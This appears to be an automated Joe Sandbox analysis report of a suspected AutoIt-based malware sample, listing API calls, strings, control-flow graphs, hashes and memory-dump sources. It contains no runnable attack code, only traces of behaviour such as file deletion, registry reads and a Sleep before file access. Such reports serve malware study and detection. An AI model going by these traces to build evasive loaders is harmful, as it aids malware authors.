                                                  • Opcode Fuzzy Hash: 5712d0f1d8866f8a5b304aeaa4b3f15982b97e810ba61fffee0b60207b4e2216
                                                  • Instruction Fuzzy Hash: 4BB28F70608741DFDB28EB24C894F6AB7E5FF85304F18491DE49AD72A1DB71E984CB82

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 008E91E9: __time64.LIBCMT ref: 008E91F3
                                                    • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                                  • __wsplitpath.LIBCMT ref: 008E94BE
                                                    • Part of subcall function 008A432E: __wsplitpath_helper.LIBCMT ref: 008A436E
                                                  • _wcscpy.LIBCMT ref: 008E94D1
                                                  • _wcscat.LIBCMT ref: 008E94E4
                                                  • __wsplitpath.LIBCMT ref: 008E9509
                                                  • _wcscat.LIBCMT ref: 008E951F
                                                  • _wcscat.LIBCMT ref: 008E9532
                                                    • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9268
                                                    • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9277
                                                  • _wcscmp.LIBCMT ref: 008E9479
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E96DC
                                                  • _wcsncpy.LIBCMT ref: 008E974F
                                                  • DeleteFileW.KERNEL32(?,?), ref: 008E9785
                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 008E979B
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97AC
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97BE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 90c62c2f127b8efd2b2b94edca3df1121b3d8868985427a9c64a31e95dda5587
                                                  • Instruction ID: f2d68174cc297901038ee72f245728a65e4dd410d671cdc1c8e41907d2a0f541
                                                  • Opcode Fuzzy Hash: 90c62c2f127b8efd2b2b94edca3df1121b3d8868985427a9c64a31e95dda5587
                                                  • Instruction Fuzzy Hash: 9CC11CB1D00219AEDF21DF99CC85ADEB7BDFF55310F0040AAF609E6251EB709A848F65

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00884864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009462F8,?,008837C0,?), ref: 00884882
                                                    • Part of subcall function 008A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008872C5), ref: 008A0771
                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00887308
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BECF1
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BED32
                                                  • RegCloseKey.ADVAPI32(?), ref: 008BED70
                                                  • _wcscat.LIBCMT ref: 008BEDC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: 098f95b78dfda42222a79e26e960cf2389e2439f0e5d75bc63e79b4df8a38363
                                                  • Instruction ID: 414b6e48fd46bd72b4022598eab469549fabc9a0f876fe3cc599f0dfafe7cbd3
                                                  • Opcode Fuzzy Hash: 098f95b78dfda42222a79e26e960cf2389e2439f0e5d75bc63e79b4df8a38363
                                                  • Instruction Fuzzy Hash: C0715B7511C3059EC324EFA9D881CABB7F8FB86740B44492EF455C32A0EBB09948DB92

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                                  • LoadIconW.USER32(00000063), ref: 00883A88
                                                  • LoadIconW.USER32(000000A4), ref: 00883A9A
                                                  • LoadIconW.USER32(000000A2), ref: 00883AAC
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                                  • RegisterClassExW.USER32(?), ref: 00883B28
                                                    • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                    • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                                    • Part of subcall function 00883041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                    • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 2880975755-4155596026
                                                  • Opcode ID: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                                                  • Instruction ID: df40e0142a417fc6fee6ed11a5b9b5914d0f3ee105b7b160fbfee4f257a3f3b2
                                                  • Opcode Fuzzy Hash: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                                                  • Instruction Fuzzy Hash: FF214DB5929308BFEB10DFA4EC19F9D7BB4FB0A711F000129E514E62A0D3B55654AF46

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: bb53c412eecc30f7fa1e9d0951183f9f0b4776f227494ee2f594553f8566e7f1
                                                  • Instruction ID: 612914fbd74f6a5e537aa7e687dd5b857ea40c9cbd290cb70931d0a9526e5bc7
                                                  • Opcode Fuzzy Hash: bb53c412eecc30f7fa1e9d0951183f9f0b4776f227494ee2f594553f8566e7f1
                                                  • Instruction Fuzzy Hash: 5BA14F75910229AACB14FBA8CC95DEEB778FF15700F540429F412F7191EF749A05CB62

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001026B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001028D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction ID: f9fb548fa3946d08bfc80d6777c59579a6a5222616c123c267797b163e967716
                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction Fuzzy Hash: 75A1F674E00209EBDB14CFA4C998BAEB7B5FF58304F208159E555BB2C0D7B99A81CF94

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                                  • ShowWindow.USER32(00000000), ref: 00883A4A
                                                  • ShowWindow.USER32(00000000), ref: 00883A53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                                                  • Instruction ID: b002539d82f0211c691fb1fa65c1fff7590ad12d698d34ae1fef628522557432
                                                  • Opcode Fuzzy Hash: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                                                  • Instruction Fuzzy Hash: 16F03AB4665290BEEB3117276C18E273E7DE7C7F50B00012AB910E21B0C2E50800EAB2

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 001022A0: Sleep.KERNELBASE(000001F4), ref: 001022B1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001024CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: S3BHZIY1UKJ6DTUVS37LPNA1
                                                  • API String ID: 2694422964-3650088209
                                                  • Opcode ID: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                                  • Instruction ID: 0665eeb9ea420e97d14d9ff9df3ba4662991080eed0f3e651a1f40b8932fd78d
                                                  • Opcode Fuzzy Hash: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                                  • Instruction Fuzzy Hash: B0517130D04289DBEF11DBE4C859BEEBBB9AF15304F044199E2487B2C1D7B91B49CBA5

                                                  Control-flow Graph

                                                  control_flow_graph 1096 88410d-884123 1097 884129-88413e call 887b76 1096->1097 1098 884200-884204 1096->1098 1101 8bd5dd-8bd5ec LoadStringW 1097->1101 1102 884144-884164 call 887d2c 1097->1102 1105 8bd5f7-8bd60f call 887c8e call 887143 1101->1105 1102->1105 1106 88416a-88416e 1102->1106 1115 88417e-8841fb call 8a3020 call 88463e call 8a2ffc Shell_NotifyIconW call 885a64 1105->1115 1118 8bd615-8bd633 call 887e0b call 887143 call 887e0b 1105->1118 1108 884174-884179 call 887c8e 1106->1108 1109 884205-88420e call 8881a7 1106->1109 1108->1115 1109->1115 1115->1098 1118->1115
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD5EC
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • _memset.LIBCMT ref: 0088418D
                                                  • _wcscpy.LIBCMT ref: 008841E1
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: e2a096bc8a19da58b930dd25fe0c25a92a332e33dcf39c70979eece1957cee86
                                                  • Instruction ID: ce68af2b9850af9c8c7c309ca72507e7d7d487adfc08885a0bb8ad44da7e3601
                                                  • Opcode Fuzzy Hash: e2a096bc8a19da58b930dd25fe0c25a92a332e33dcf39c70979eece1957cee86
                                                  • Instruction Fuzzy Hash: 9B3190B200C315AAE731FB68DC45FDB77E8FB56314F20461AB195D20A1EBB4A648C793

                                                  Control-flow Graph

                                                  control_flow_graph 1190 8a564d-8a5666 1191 8a5668-8a566d 1190->1191 1192 8a5683 1190->1192 1191->1192 1194 8a566f-8a5671 1191->1194 1193 8a5685-8a568b 1192->1193 1195 8a568c-8a5691 1194->1195 1196 8a5673-8a5678 call 8a8d68 1194->1196 1198 8a569f-8a56a3 1195->1198 1199 8a5693-8a569d 1195->1199 1204 8a567e call 8a8ff6 1196->1204 1202 8a56b3-8a56b5 1198->1202 1203 8a56a5-8a56b0 call 8a3020 1198->1203 1199->1198 1201 8a56c3-8a56d2 1199->1201 1207 8a56d9 1201->1207 1208 8a56d4-8a56d7 1201->1208 1202->1196 1206 8a56b7-8a56c1 1202->1206 1203->1202 1204->1192 1206->1196 1206->1201 1209 8a56de-8a56e3 1207->1209 1208->1209 1212 8a56e9-8a56f0 1209->1212 1213 8a57cc-8a57cf 1209->1213 1214 8a56f2-8a56fa 1212->1214 1215 8a5731-8a5733 1212->1215 1213->1193 1214->1215 1216 8a56fc 1214->1216 1217 8a579d-8a579e call 8b0df7 1215->1217 1218 8a5735-8a5737 1215->1218 1219 8a57fa 1216->1219 1220 8a5702-8a5704 1216->1220 1229 8a57a3-8a57a7 1217->1229 1222 8a575b-8a5766 1218->1222 1223 8a5739-8a5741 1218->1223 1228 8a57fe-8a5807 1219->1228 1226 8a570b-8a5710 1220->1226 1227 8a5706-8a5708 1220->1227 1224 8a576a-8a576d 1222->1224 1225 8a5768 1222->1225 1230 8a5743-8a574f 1223->1230 1231 8a5751-8a5755 1223->1231 1233 8a576f-8a577b call 8a4916 call 8b10ab 1224->1233 1234 8a57d4-8a57d8 1224->1234 1225->1224 1226->1234 1235 8a5716-8a572f call 8b0f18 1226->1235 1227->1226 1228->1193 1229->1228 1236 8a57a9-8a57ae 1229->1236 1232 8a5757-8a5759 1230->1232 1231->1232 1232->1224 1251 8a5780-8a5785 1233->1251 1238 8a57ea-8a57f5 call 8a8d68 1234->1238 1239 8a57da-8a57e7 call 8a3020 1234->1239 1250 8a5792-8a579b 1235->1250 1236->1234 1237 8a57b0-8a57c1 1236->1237 1242 8a57c4-8a57c6 1237->1242 1238->1204 1239->1238 1242->1212 1242->1213 1250->1242 1252 8a578b-8a578e 1251->1252 1253 8a580c-8a5810 1251->1253 1252->1219 1254 8a5790 1252->1254 1253->1228 1254->1250
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                  • Instruction ID: a8c9d7cdc34dd1b7a68cd2ff06492c9ff89dc08201488cd9622f0f6b5d4b08d5
                                                  • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                  • Instruction Fuzzy Hash: 8751B571A00B09DBEB248FB9C88466E77A1FF52324F648729F825E6AD0D7709D908B51

                                                  Control-flow Graph

                                                  control_flow_graph 1255 8869ca-8869f1 call 884f3d 1258 8be45a-8be46a call 8e97e5 1255->1258 1259 8869f7-886a05 call 884f3d 1255->1259 1263 8be46f-8be471 1258->1263 1259->1258 1264 886a0b-886a11 1259->1264 1265 8be473-8be476 call 884faa 1263->1265 1266 8be490-8be4d8 call 8a0ff6 1263->1266 1268 8be47b-8be48a call 8e4534 1264->1268 1269 886a17-886a39 call 886bec 1264->1269 1265->1268 1275 8be4da-8be4e4 1266->1275 1276 8be4fd 1266->1276 1268->1266 1278 8be4f8-8be4f9 1275->1278 1279 8be4ff-8be512 1276->1279 1280 8be4fb 1278->1280 1281 8be4e6-8be4f5 1278->1281 1282 8be689-8be69a call 8a2f95 call 884faa 1279->1282 1283 8be518 1279->1283 1280->1279 1281->1278 1293 8be69c-8be6ac call 887776 call 885efb 1282->1293 1285 8be51f-8be522 call 8875e0 1283->1285 1289 8be527-8be549 call 885f12 call 8e768b 1285->1289 1298 8be54b-8be558 1289->1298 1299 8be55d-8be567 call 8e7675 1289->1299 1306 8be6b1-8be6e1 call 8dfcb1 call 8a106c call 8a2f95 call 884faa 1293->1306 1302 8be650-8be660 call 88766f 1298->1302 1308 8be569-8be57c 1299->1308 1309 8be581-8be58b call 8e765f 1299->1309 1302->1289 1311 8be666-8be683 call 8874bd 1302->1311 1306->1293 1308->1302 1318 8be59f-8be5a9 call 885f8a 1309->1318 1319 8be58d-8be59a 1309->1319 1311->1282 1311->1285 1318->1302 1324 8be5af-8be5c7 call 8dfc4d 1318->1324 1319->1302 1330 8be5ea-8be5ed 1324->1330 1331 8be5c9-8be5e8 call 887f41 call 885a64 1324->1331 1333 8be61b-8be61e 1330->1333 1334 8be5ef-8be60a call 887f41 call 886999 call 885a64 1330->1334 1355 8be60b-8be619 call 885f12 1331->1355 1336 8be63e-8be641 call 8e7621 1333->1336 1337 8be620-8be629 call 8dfb6e 1333->1337 1334->1355 1344 8be646-8be647 call 8a106c 1336->1344 1337->1306 1347 8be62f-8be639 call 8a106c 1337->1347 1350 8be64c-8be64f 1344->1350 1347->1289 1350->1302 1355->1344
                                                  APIs
                                                    • Part of subcall function 00884F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                                  • _free.LIBCMT ref: 008BE68C
                                                  • _free.LIBCMT ref: 008BE6D3
                                                    • Part of subcall function 00886BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: ac3f92deaa02749ff6c1dc7ac35b6a65d80e21b222c7c9ebba4f5abeefe6b108
                                                  • Instruction ID: eaf4352113fdb991e1f9b3970f1e6837b365ab8ff63fc96d10e7704b9acea53b
                                                  • Opcode Fuzzy Hash: ac3f92deaa02749ff6c1dc7ac35b6a65d80e21b222c7c9ebba4f5abeefe6b108
                                                  • Instruction Fuzzy Hash: FD916B71910619AFCF14EFA8CC919EDB7B4FF19314F14446AF816EB2A1EB30A904CB61
                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                                  • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                                                  • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                                  • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                                                  APIs
                                                    • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                                                  • _free.LIBCMT ref: 008E992C
                                                  • _free.LIBCMT ref: 008E9933
                                                  • _free.LIBCMT ref: 008E999E
                                                    • Part of subcall function 008A2F95: HeapFree.KERNEL32(00000000,00000000), ref: 008A2FA9
                                                    • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                                                  • _free.LIBCMT ref: 008E99A6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                  • Instruction ID: 9ad59ede26655de7c97f30b735369bd6a5aa280fa879a53e7d27d5539949eae2
                                                  • Opcode Fuzzy Hash: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                  • Instruction Fuzzy Hash: 89517BB1904658AFDF249F69CC81A9EBBB9FF49310F0000AEF649E7241DB715A80CF59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction ID: 3858f6d37771f47e3c24ca3dc1aec4d15985f3fb40e152fca00f3eedcc3d25c6
                                                  • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction Fuzzy Hash: 7441C7716007199BFF188E69C88056F7BA6FFC6360B24913DE855C7E50D7B0AD518744
                                                  APIs
                                                  • _memset.LIBCMT ref: 008BEE62
                                                  • 75B0A2D5.COMDLG32(?), ref: 008BEEAC
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                    • Part of subcall function 008A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
